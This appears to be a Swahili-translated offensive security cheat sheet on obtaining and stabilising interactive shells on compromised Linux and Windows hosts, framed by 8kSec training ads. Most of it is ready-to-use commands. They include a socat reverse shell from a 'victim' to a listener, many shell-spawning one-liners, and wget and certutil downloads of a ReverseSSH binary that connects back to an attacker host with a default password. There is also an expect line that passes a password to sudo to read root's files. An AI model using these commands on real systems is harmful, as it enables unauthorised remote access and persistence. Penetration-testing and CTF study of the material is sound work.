Full TTYs

Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:

On-demand Mobile Security Training | 8kSec Academy8kSec Academy

Full TTY

Kumbuka kwamba shell uliyoweka katika mabadiliko ya SHELL lazima iwe imeorodheshwa ndani ya /etc/shells au Thamani ya mabadiliko ya SHELL haikupatikana katika faili ya /etc/shells Tukio hili limeripotiwa. Pia, kumbuka kwamba vipande vifuatavyo vinatumika tu katika bash. Ikiwa uko katika zsh, badilisha kuwa bash kabla ya kupata shell kwa kukimbia bash.

Python

python3 -c 'import pty; pty.spawn("/bin/bash")'

(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

script

script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

socat

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Spawn shells

• python -c 'import pty; pty.spawn("/bin/sh")'

• echo os.system('/bin/bash')

• /bin/sh -i

• script -qc /bin/bash /dev/null

• perl -e 'exec "/bin/sh";'

• perl: exec "/bin/sh";

• ruby: exec "/bin/sh"

• lua: os.execute('/bin/sh')

• IRB: exec "/bin/sh"

• vi: :!bash

• vi: :set shell=/bin/bash:shell

• nmap: !sh

ReverseSSH

Njia rahisi ya interactive shell access, pamoja na file transfers na port forwarding, ni kuangusha server ya ssh iliyo na uhusiano wa kudumu ReverseSSH kwenye lengo.

Hapa kuna mfano wa x86 na binaries zilizoshinikizwa na upx. Kwa binaries nyingine, angalia releases page.

1. Andaa mahali ili kukamata ombi la port forwarding la ssh:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -v -l -p 4444

• (2a) Lengo la Linux:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2

• (2b) Lengo la Windows 10 (kwa toleo za awali, angalia project readme):

# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe

reverse-ssh.exe -p 4444 kali@10.0.0.2

• Ikiwa ombi la kupeleka bandari la ReverseSSH lilifanikiwa, sasa unapaswa kuwa na uwezo wa kuingia kwa kutumia nenosiri la kawaida letmeinbrudipls katika muktadha wa mtumiaji anayekimbia reverse-ssh(.exe):

# Interactive shell access
ssh -p 8888 127.0.0.1

# Bidirectional file transfer
sftp -P 8888 127.0.0.1

Penelope

Penelope inaboresha kiotomatiki Linux reverse shells kuwa TTY, inashughulikia ukubwa wa terminal, inaandika kila kitu na mengi zaidi. Pia inatoa msaada wa readline kwa Windows shells.

No TTY

Ikiwa kwa sababu fulani huwezi kupata TTY kamili unaweza bado kuingiliana na programu zinazotarajia pembejeo ya mtumiaji. Katika mfano ufuatao, nenosiri linapitishwa kwa sudo ili kusoma faili:

expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'

Panua ujuzi wako katika Usalama wa Simu na 8kSec Academy. Master usalama wa iOS na Android kupitia kozi zetu za kujifunza kwa kasi yako na upate cheti:

On-demand Mobile Security Training | 8kSec Academy8kSec Academy